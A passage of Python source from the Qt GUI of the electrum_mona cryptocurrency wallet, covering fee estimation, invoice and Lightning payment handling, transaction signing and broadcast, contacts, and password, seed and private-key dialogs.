return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.is_onchain:
return
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs = self.read_outputs()
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + '\t' + "%s"%x.get('address') + '\t'
for coin in self.pay_from:
item = QTreeWidgetItem([format(coin), self.format_amount(coin['value'])])
item.setFont(0, QFont(MONOSPACE_FONT))
self.from_list.addTopLevelItem(item)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
@protected
def protect(self, func, args, password):
return func(*args, password)
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_outputs(self):
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice):
amount_sat = self.amount_e.get_amount()
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
try:
self.wallet.lnworker.pay(invoice, amount_sat, attempts)
except Exception as e:
self.show_error(str(e))
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, key, status):
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
def on_invoice_status(self, key, status, log):
if key not in self.wallet.invoices:
return
self.invoice_list.update_item(key, status, log)
if status == PR_PAID:
self.show_message(_('Payment succeeded'))
self.need_update.set()
elif status == PR_FAILED:
self.show_error(_('Payment failed'))
else:
pass
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self.is_onchain:
invoice = self.payto_e.lightning_invoice
if not invoice:
return
if not self.wallet.lnworker:
self.show_error(_('Lightning is disabled'))
return
return self.wallet.lnworker.parse_bech32_invoice(invoice)
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(outputs, message, self.payment_request, self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_preview(self):
self.do_pay(preview=True)
def do_pay(self, preview=False):
invoice = self.read_invoice()
if not invoice:
return
if not preview:
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_pay_invoice(invoice, preview)
def do_pay_invoice(self, invoice, preview=False):
if invoice['type'] == PR_TYPE_LN:
self.pay_lightning_invoice(invoice['invoice'])
return
elif invoice['type'] == PR_TYPE_ONCHAIN:
message = invoice['message']
outputs = invoice['outputs']
else:
raise Exception('unknown invoice type')
if run_hook('abort_send', self):
return
outputs = [TxOutput(*x) for x in outputs]
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x: x.value, outputs))
fee = tx.get_fee()
#use_rbf = bool(self.config.get('use_rbf', True))
#if use_rbf:
# tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, message)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
self.do_clear()
if not tx.is_complete():
self.show_transaction(tx)
else:
self.broadcast_transaction(tx, message)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
key = pr.get_id()
#self.wallet.set_invoice_paid(key, tx.txid())
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
@protected
def open_channel(self, *args, **kwargs):
def task():
return self.wallet.lnworker.open_channel(*args, **kwargs)
def on_success(chan):
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
self.show_message(message)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(e))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and invoice['status'] == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
from electrum_mona.lnaddr import lndecode, LnDecodeException
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.amount is not None:
self.amount_e.setAmount(lnaddr.amount * COIN)
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self.is_onchain = b
self.preview_button.setEnabled(b)
self.max_button.setEnabled(b)
self.show_send_tab_onchain_fees(b)
def show_send_tab_onchain_fees(self, b: bool):
self.feecontrol_fields.setEnabled(b)
#self.fee_e_label.setVisible(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.is_onchain = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.set_onchain(len(coins) > 0)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
invoice = self.wallet.get_invoice(key)
if invoice is None:
self.show_error('Cannot find payment request in wallet.')
return
bip70 = invoice.get('bip70')
if bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(bip70))
pr.verify(self.contacts)
self.show_bip70_details(pr)
def show_bip70_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("BIP70 Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.wallet.delete_invoices(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def pay_bip70_invoice(self, key):
pr = self.wallet.get_invoice(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.storage.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum_mona,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
if self.wallet.has_lightning():
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
sb.addPermanentWidget(self.lightning_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_mona.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def disable_lightning(self):
warning = _('This will delete your lightning private keys')
r = self.question(_('Disable Lightning payments?') + '\n\n' + warning)
if not r:
return
self.wallet.remove_lightning()
self.show_warning(_('Lightning keys have been removed. This wallet will be closed'))
self.close()
def enable_lightning(self):
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
r = self.question(_('Enable Lightning payments?') + '\n\n' + _('WARNINGS') + ': ' + '\n\n' + warning1 + '\n\n' + warning2)
if not r:
return
self.wallet.init_lightning()
self.show_warning(_('Lightning keys have been initialized. This wallet will be closed'))
self.close()
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
if self.wallet.has_lightning():
lightning_b = QPushButton(_('Disable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.disable_lightning)
lightning_label = QLabel(_('Enabled'))
lightning_b.setDisabled(bool(self.wallet.lnworker.channels))
#else:
#lightning_b = QPushButton(_('Enable'))
#lightning_b.clicked.connect(dialog.close)
#lightning_b.clicked.connect(self.enable_lightning)
#lightning_label = QLabel(_('Disabled'))
#grid.addWidget(QLabel(_('Lightning')), 5, 0)
#grid.addWidget(lightning_label, 5, 1)
#grid.addWidget(lightning_b, 5, 2)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
# only show the combobox if multiple master keys are defined
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btns = run_hook('wallet_info_buttons', self, dialog) or Buttons(CloseButton(dialog))
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
